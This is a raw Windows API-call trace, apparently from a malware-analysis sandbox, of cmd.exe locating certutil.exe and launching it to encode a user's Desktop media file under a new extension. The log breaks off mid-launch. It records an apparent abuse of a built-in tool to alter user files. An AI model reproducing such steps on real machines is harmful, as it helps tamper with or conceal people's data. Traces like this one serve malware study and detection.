GetProcessHeap () returned 0x21ed8c70000 [0233.401] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c789e0) returned 0x35e [0233.401] GetProcessHeap () returned 0x21ed8c70000 [0233.401] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d68d40 [0233.401] GetProcessHeap () returned 0x21ed8c70000 [0233.401] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d68d40, Size=0x58) returned 0x21ed8d68d40 [0233.401] GetProcessHeap () returned 0x21ed8c70000 [0233.402] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d68d40) returned 0x58 [0233.402] GetProcessHeap () returned 0x21ed8c70000 [0233.402] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d68db0 [0233.402] malloc (_Size=0x1ff9c) returned 0x21ed97bfc00 [0233.402] GetProcessHeap () returned 0x21ed8c70000 [0233.402] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x48) returned 0x21ed8c7be40 [0233.402] ??_V@YAXPEAX@Z () returned 0x1 [0233.402] malloc (_Size=0x1ff9c) returned 0x21ed97bfc00 [0233.402] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xa6cf4fdf20 | out: lpFindFileData=0xa6cf4fdf20*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xea2a58ee, cFileName="Users", cAlternateFileName="")) returned 0x21ed8c7ce80 [0233.402] FindClose (in: hFindFile=0x21ed8c7ce80 | out: hFindFile=0x21ed8c7ce80) returned 1 [0233.402] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy", lpFindFileData=0xa6cf4fdf20 | out: lpFindFileData=0xa6cf4fdf20*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xea2a58ee, cFileName="FD1HVy", cAlternateFileName="")) returned 0x21ed8c7cb80 [0233.403] FindClose (in: hFindFile=0x21ed8c7cb80 | out: hFindFile=0x21ed8c7cb80) returned 1 [0233.403] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", lpFindFileData=0xa6cf4fdf20 | out: lpFindFileData=0xa6cf4fdf20*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xb55b3a94, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0xb55b3a94, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xea2a58ee, cFileName="Desktop", cAlternateFileName="")) returned 0x21ed8c7d0c0 [0233.403] FindClose (in: hFindFile=0x21ed8c7d0c0 | out: hFindFile=0x21ed8c7d0c0) returned 1 [0233.403] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\KoSrfJhDHVv1O_ 2.m4a.Sister", lpFindFileData=0xa6cf4fdf20 | out: lpFindFileData=0xa6cf4fdf20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6a81feb0, ftCreationTime.dwHighDateTime=0x1d5e999, ftLastAccessTime.dwLowDateTime=0x3ad49150, ftLastAccessTime.dwHighDateTime=0x1d5e64c, ftLastWriteTime.dwLowDateTime=0x3ad49150, ftLastWriteTime.dwHighDateTime=0x1d5e64c, nFileSizeHigh=0x0, nFileSizeLow=0x63c2, dwReserved0=0x0, dwReserved1=0xea2a58ee, cFileName="KoSrfJhDHVv1O_ 2.m4a.Sister", cAlternateFileName="KOSRFJ~1.SIS")) returned 0x21ed8c7cee0 [0233.403] FindClose (in: hFindFile=0x21ed8c7cee0 | out: hFindFile=0x21ed8c7cee0) returned 1 [0233.403] _wcsnicmp (_String1="KOSRFJ~1.SIS", _String2="KoSrfJhDHVv1O_ 2.m4a.Sister", _MaxCount=0x1b) returned 22 [0233.403] malloc (_Size=0x1ff9c) returned 0x21ed97dfbb0 [0233.403] ??_V@YAXPEAX@Z () returned 0x21ed97dfbb0 [0233.404] GetProcessHeap () returned 0x21ed8c70000 [0233.404] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x3a) returned 0x21ed8c7ba30 [0233.404] ??_V@YAXPEAX@Z () returned 0x1 [0233.404] ??_V@YAXPEAX@Z () returned 0x1 [0233.404] GetProcessHeap () returned 0x21ed8c70000 [0233.404] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d68db0, Size=0x230) returned 0x21ed8d68db0 [0233.404] GetProcessHeap () returned 0x21ed8c70000 [0233.404] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d68db0) returned 0x230 [0233.404] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe2b8 | out: _Buffer="\r\n") returned 2 [0233.404] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.404] GetFileType (hFile=0x50) returned 0x2 [0233.404] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0233.404] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe248 | out: lpMode=0xa6cf4fe248) returned 1 [0233.474] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.474] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe288, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe288*=0x2) returned 1 [0233.583] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x7ff66c5cbb90, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0233.583] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8e50080 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0233.583] _vsnwprintf (in: _Buffer=0x21ed8e80160, _BufferCount=0x83e5, _Format="%s", _ArgList=0xa6cf4fe2c8 | out: _Buffer="C:\\Users\\FD1HVy\\Desktop") returned 23 [0233.583] _vsnwprintf (in: _Buffer=0x21ed8e8018e, _BufferCount=0x83ce, _Format="%c", _ArgList=0xa6cf4fe2c8 | out: _Buffer=">") returned 1 [0233.583] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.583] GetFileType (hFile=0x50) returned 0x2 [0233.583] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0233.583] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe278 | out: lpMode=0xa6cf4fe278) returned 1 [0233.663] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.663] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8e80160*, nNumberOfCharsToWrite=0x18, lpNumberOfCharsWritten=0xa6cf4fe2b8, lpReserved=0x0 | out: lpBuffer=0x21ed8e80160*, lpNumberOfCharsWritten=0xa6cf4fe2b8*=0x18) returned 1 [0233.694] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.694] GetFileType (hFile=0x50) returned 0x2 [0233.694] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0233.694] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe548 | out: lpMode=0xa6cf4fe548) returned 1 [0233.731] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.731] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8d68d50*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0xa6cf4fe588, lpReserved=0x0 | out: lpBuffer=0x21ed8d68d50*, lpNumberOfCharsWritten=0xa6cf4fe588*=0x8) returned 1 [0233.732] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe588 | out: _Buffer=" -encode \"KoSrfJhDHVv1O_ 2.m4a.Sister\" \"KoSrfJhDHVv1O_ 2.m4a.Cruel\" ") returned 68 [0233.732] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.732] GetFileType (hFile=0x50) returned 0x2 [0233.732] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0233.732] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe518 | out: lpMode=0xa6cf4fe518) returned 1 [0233.733] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.733] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x44, lpNumberOfCharsWritten=0xa6cf4fe558, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe558*=0x44) returned 1 [0233.733] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe5b8 | out: _Buffer="\r\n") returned 2 [0233.733] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.733] GetFileType (hFile=0x50) returned 0x2 [0233.733] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0233.733] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe548 | out: lpMode=0xa6cf4fe548) returned 1 [0233.734] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.734] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe588, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe588*=0x2) returned 1 [0233.739] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fe300, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0233.740] malloc (_Size=0xffce) returned 0x21ed8ea0920 [0233.740] ??_V@YAXPEAX@Z () returned 0x21ed8ea0920 [0233.740] malloc (_Size=0xffce) returned 0x21ed97bfc00 [0233.740] ??_V@YAXPEAX@Z () returned 0x21ed97bfc00 [0233.740] _wcsicmp (_String1="certutil", _String2="DIR") returned -1 [0233.740] _wcsicmp (_String1="certutil", _String2="ERASE") returned -2 [0233.740] _wcsicmp (_String1="certutil", _String2="DEL") returned -1 [0233.740] _wcsicmp (_String1="certutil", _String2="TYPE") returned -17 [0233.740] _wcsicmp (_String1="certutil", _String2="COPY") returned -10 [0233.740] _wcsicmp (_String1="certutil", _String2="CD") returned 1 [0233.740] _wcsicmp (_String1="certutil", _String2="CHDIR") returned -3 [0233.740] _wcsicmp (_String1="certutil", _String2="RENAME") returned -15 [0233.740] _wcsicmp (_String1="certutil", _String2="REN") returned -15 [0233.740] _wcsicmp (_String1="certutil", _String2="ECHO") returned -2 [0233.742] _wcsicmp (_String1="certutil", _String2="SET") returned -16 [0233.742] _wcsicmp (_String1="certutil", _String2="PAUSE") returned -13 [0233.742] _wcsicmp (_String1="certutil", _String2="DATE") returned -1 [0233.742] _wcsicmp (_String1="certutil", _String2="TIME") returned -17 [0233.742] _wcsicmp (_String1="certutil", _String2="PROMPT") returned -13 [0233.742] _wcsicmp (_String1="certutil", _String2="MD") returned -10 [0233.742] _wcsicmp (_String1="certutil", _String2="MKDIR") returned -10 [0233.742] _wcsicmp (_String1="certutil", _String2="RD") returned -15 [0233.742] _wcsicmp (_String1="certutil", _String2="RMDIR") returned -15 [0233.742] _wcsicmp (_String1="certutil", _String2="PATH") returned -13 [0233.742] _wcsicmp (_String1="certutil", _String2="GOTO") returned -4 [0233.742] _wcsicmp (_String1="certutil", _String2="SHIFT") returned -16 [0233.742] _wcsicmp (_String1="certutil", _String2="CLS") returned -7 [0233.742] _wcsicmp (_String1="certutil", _String2="CALL") returned 4 [0233.742] _wcsicmp (_String1="certutil", _String2="VERIFY") returned -19 [0233.743] _wcsicmp (_String1="certutil", _String2="VER") returned -19 [0233.743] _wcsicmp (_String1="certutil", _String2="VOL") returned -19 [0233.743] _wcsicmp (_String1="certutil", _String2="EXIT") returned -2 [0233.743] _wcsicmp (_String1="certutil", _String2="SETLOCAL") returned -16 [0233.743] _wcsicmp (_String1="certutil", _String2="ENDLOCAL") returned -2 [0233.743] _wcsicmp (_String1="certutil", _String2="TITLE") returned -17 [0233.743] _wcsicmp (_String1="certutil", _String2="START") returned -16 [0233.743] _wcsicmp (_String1="certutil", _String2="DPATH") returned -1 [0233.743] _wcsicmp (_String1="certutil", _String2="KEYS") returned -8 [0233.743] _wcsicmp (_String1="certutil", _String2="MOVE") returned -10 [0233.743] _wcsicmp (_String1="certutil", _String2="PUSHD") returned -13 [0233.743] _wcsicmp (_String1="certutil", _String2="POPD") returned -13 [0233.743] _wcsicmp (_String1="certutil", _String2="ASSOC") returned 2 [0233.743] _wcsicmp (_String1="certutil", _String2="FTYPE") returned -3 [0233.743] _wcsicmp (_String1="certutil", _String2="BREAK") returned 1 [0233.743] _wcsicmp (_String1="certutil", _String2="COLOR") returned -10 [0233.743] _wcsicmp (_String1="certutil", _String2="MKLINK") returned -10 [0233.743] _wcsicmp (_String1="certutil", _String2="DIR") returned -1 [0233.743] _wcsicmp (_String1="certutil", _String2="ERASE") returned -2 [0233.743] _wcsicmp (_String1="certutil", _String2="DEL") returned -1 [0233.743] _wcsicmp (_String1="certutil", _String2="TYPE") returned -17 [0233.743] _wcsicmp (_String1="certutil", _String2="COPY") returned -10 [0233.743] _wcsicmp (_String1="certutil", _String2="CD") returned 1 [0233.743] _wcsicmp (_String1="certutil", _String2="CHDIR") returned -3 [0233.743] _wcsicmp (_String1="certutil", _String2="RENAME") returned -15 [0233.743] _wcsicmp (_String1="certutil", _String2="REN") returned -15 [0233.744] _wcsicmp (_String1="certutil", _String2="ECHO") returned -2 [0233.744] _wcsicmp (_String1="certutil", _String2="SET") returned -16 [0233.744] _wcsicmp (_String1="certutil", _String2="PAUSE") returned -13 [0233.744] _wcsicmp (_String1="certutil", _String2="DATE") returned -1 [0233.744] _wcsicmp (_String1="certutil", _String2="TIME") returned -17 [0233.744] _wcsicmp (_String1="certutil", _String2="PROMPT") returned -13 [0233.744] _wcsicmp (_String1="certutil", _String2="MD") returned -10 [0233.744] _wcsicmp (_String1="certutil", _String2="MKDIR") returned -10 [0233.744] _wcsicmp (_String1="certutil", _String2="RD") returned -15 [0233.744] _wcsicmp (_String1="certutil", _String2="RMDIR") returned -15 [0233.744] _wcsicmp (_String1="certutil", _String2="PATH") returned -13 [0233.744] _wcsicmp (_String1="certutil", _String2="GOTO") returned -4 [0233.744] _wcsicmp (_String1="certutil", _String2="SHIFT") returned -16 [0233.744] _wcsicmp (_String1="certutil", _String2="CLS") returned -7 [0233.744] _wcsicmp (_String1="certutil", _String2="CALL") returned 4 [0233.744] _wcsicmp (_String1="certutil", _String2="VERIFY") returned -19 [0233.744] _wcsicmp (_String1="certutil", _String2="VER") returned -19 [0233.744] _wcsicmp (_String1="certutil", _String2="VOL") returned -19 [0233.744] _wcsicmp (_String1="certutil", _String2="EXIT") returned -2 [0233.744] _wcsicmp (_String1="certutil", _String2="SETLOCAL") returned -16 [0233.744] _wcsicmp (_String1="certutil", _String2="ENDLOCAL") returned -2 [0233.744] _wcsicmp (_String1="certutil", _String2="TITLE") returned -17 [0233.744] _wcsicmp (_String1="certutil", _String2="START") returned -16 [0233.744] _wcsicmp (_String1="certutil", _String2="DPATH") returned -1 [0233.744] _wcsicmp (_String1="certutil", _String2="KEYS") returned -8 [0233.745] _wcsicmp (_String1="certutil", _String2="MOVE") returned -10 [0233.745] _wcsicmp (_String1="certutil", _String2="PUSHD") returned -13 [0233.745] _wcsicmp (_String1="certutil", _String2="POPD") returned -13 [0233.745] _wcsicmp (_String1="certutil", _String2="ASSOC") returned 2 [0233.745] _wcsicmp (_String1="certutil", _String2="FTYPE") returned -3 [0233.745] _wcsicmp (_String1="certutil", _String2="BREAK") returned 1 [0233.745] _wcsicmp (_String1="certutil", _String2="COLOR") returned -10 [0233.745] _wcsicmp (_String1="certutil", _String2="MKLINK") returned -10 [0233.745] _wcsicmp (_String1="certutil", _String2="FOR") returned -3 [0233.745] _wcsicmp (_String1="certutil", _String2="IF") returned -6 [0233.745] _wcsicmp (_String1="certutil", _String2="REM") returned -15 [0233.745] ??_V@YAXPEAX@Z () returned 0x1 [0233.745] GetProcessHeap () returned 0x21ed8c70000 [0233.745] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xffde) returned 0x21ed92c1210 [0233.745] GetProcessHeap () returned 0x21ed8c70000 [0233.745] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xaa) returned 0x21ed8c96400 [0233.745] _wcsnicmp (_String1="cert", _String2="cmd ", _MaxCount=0x4) returned -8 [0233.746] malloc (_Size=0xffce) returned 0x21ed97bfc00 [0233.746] ??_V@YAXPEAX@Z () returned 0x21ed97bfc00 [0233.746] GetProcessHeap () returned 0x21ed8c70000 [0233.746] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x1ffac) returned 0x21ed92d1200 [0233.747] SetErrorMode (uMode=0x0) returned 0x0 [0233.747] SetErrorMode (uMode=0x1) returned 0x0 [0233.747] GetFullPathNameW (in: lpFileName=".", nBufferLength=0xffce, lpBuffer=0x21ed92d1210, lpFilePart=0xa6cf4fdb80 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop", lpFilePart=0xa6cf4fdb80*="Desktop") returned 0x17 [0233.747] SetErrorMode (uMode=0x0) returned 0x1 [0233.747] GetProcessHeap () returned 0x21ed8c70000 [0233.747] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed92d1200, Size=0x52) returned 0x21ed92d1200 [0233.747] GetProcessHeap () returned 0x21ed8c70000 [0233.747] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed92d1200) returned 0x52 [0233.747] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x7ff66c5cbb90, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\WINDOWS\\system32;C:\\WINDOWS;C:\\WINDOWS\\System32\\Wbem;C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\;C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\WindowsApps") returned 0xbb [0233.747] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0233.747] GetProcessHeap () returned 0x21ed8c70000 [0233.748] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x1bc) returned 0x21ed8d5f810 [0233.748] GetProcessHeap () returned 0x21ed8c70000 [0233.748] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x368) returned 0x21ed8c78d50 [0233.748] GetProcessHeap () returned 0x21ed8c70000 [0233.748] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c78d50, Size=0x1be) returned 0x21ed8c78d50 [0233.748] GetProcessHeap () returned 0x21ed8c70000 [0233.748] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c78d50) returned 0x1be [0233.748] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x7ff66c5cbb90, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0233.748] GetProcessHeap () returned 0x21ed8c70000 [0233.748] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xe8) returned 0x21ed8c765d0 [0233.748] GetProcessHeap () returned 0x21ed8c70000 [0233.748] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c765d0, Size=0x7e) returned 0x21ed8c765d0 [0233.748] GetProcessHeap () returned 0x21ed8c70000 [0233.748] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c765d0) returned 0x7e [0233.748] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0233.748] FindFirstFileExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\certutil.*", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0xffffffffffffffff [0233.749] GetLastError () returned 0x2 [0233.749] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0233.749] FindFirstFileExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\certutil.*", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0xffffffffffffffff [0233.749] GetLastError () returned 0x2 [0233.749] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0233.749] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\certutil.*", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0x21ed8c7ca60 [0233.749] FindClose (in: hFindFile=0x21ed8c7ca60 | out: hFindFile=0x21ed8c7ca60) returned 1 [0233.749] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\certutil.COM", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0xffffffffffffffff [0233.750] GetLastError () returned 0x2 [0233.750] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\certutil.EXE", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0x21ed8c7d060 [0233.750] FindClose (in: hFindFile=0x21ed8c7d060 | out: hFindFile=0x21ed8c7d060) returned 1 [0233.750] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0233.750] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0233.750] ??_V@YAXPEAX@Z () returned 0x1 [0233.750] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fde70, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0233.751] InitializeProcThreadAttributeList (in: lpAttributeList=0xa6cf4fdd90, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0xa6cf4fdc80 | out: lpAttributeList=0xa6cf4fdd90, lpSize=0xa6cf4fdc80) returned 1 [0233.751] UpdateProcThreadAttribute (in: lpAttributeList=0xa6cf4fdd90, dwFlags=0x0, Attribute=0x60001, lpValue=0xa6cf4fdc6c, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0xa6cf4fdd90, lpPreviousValue=0x0) returned 1 [0233.751] GetStartupInfoW (in: lpStartupInfo=0xa6cf4fdd20 | out: lpStartupInfo=0xa6cf4fdd20*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\WINDOWS\\sysnative\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0233.751] GetProcessHeap () returned 0x21ed8c70000 [0233.751] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x20) returned 0x21ed8d45ce0 [0233.751] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0233.751] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0233.752] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0233.752] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0233.752] _wcsnicmp (_String1="COPYCMD", _String2="b2eincf", _MaxCount=0x7) returned 1 [0233.752] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0233.752] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0233.752] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0233.752] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0233.752] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0233.752] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0233.752] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0233.752] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0233.752] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0233.752] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0233.752] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0233.752] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0233.752] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0233.752] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0233.752] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0233.752] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0233.752] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0233.752] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0233.752] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0233.752] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0233.752] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0233.752] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0233.752] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0233.753] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0233.753] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0233.753] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0233.753] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0233.753] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0233.753] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0233.753] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0233.753] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0233.753] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0233.753] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0233.753] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0233.753] GetProcessHeap () returned 0x21ed8c70000 [0233.753] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d45ce0) returned 1 [0233.753] GetProcessHeap () returned 0x21ed8c70000 [0233.753] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x12) returned 0x21ed8c95920 [0233.753] lstrcmpW (lpString1="\\certutil.exe", lpString2="\\XCOPY.EXE") returned -1 [0233.753] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.757] SetConsoleMode (hConsoleHandle=0x50, dwMode=0x3) returned 1 [0233.757] _get_osfhandle (_FileHandle=0) returned 0x4c [0233.757] SetConsoleMode (hConsoleHandle=0x4c, dwMode=0x1f7) returned 1 [0233.758] CreateProcessW (in: lpApplicationName="C:\\WINDOWS\\system32\\certutil.exe", lpCommandLine="certutil -encode 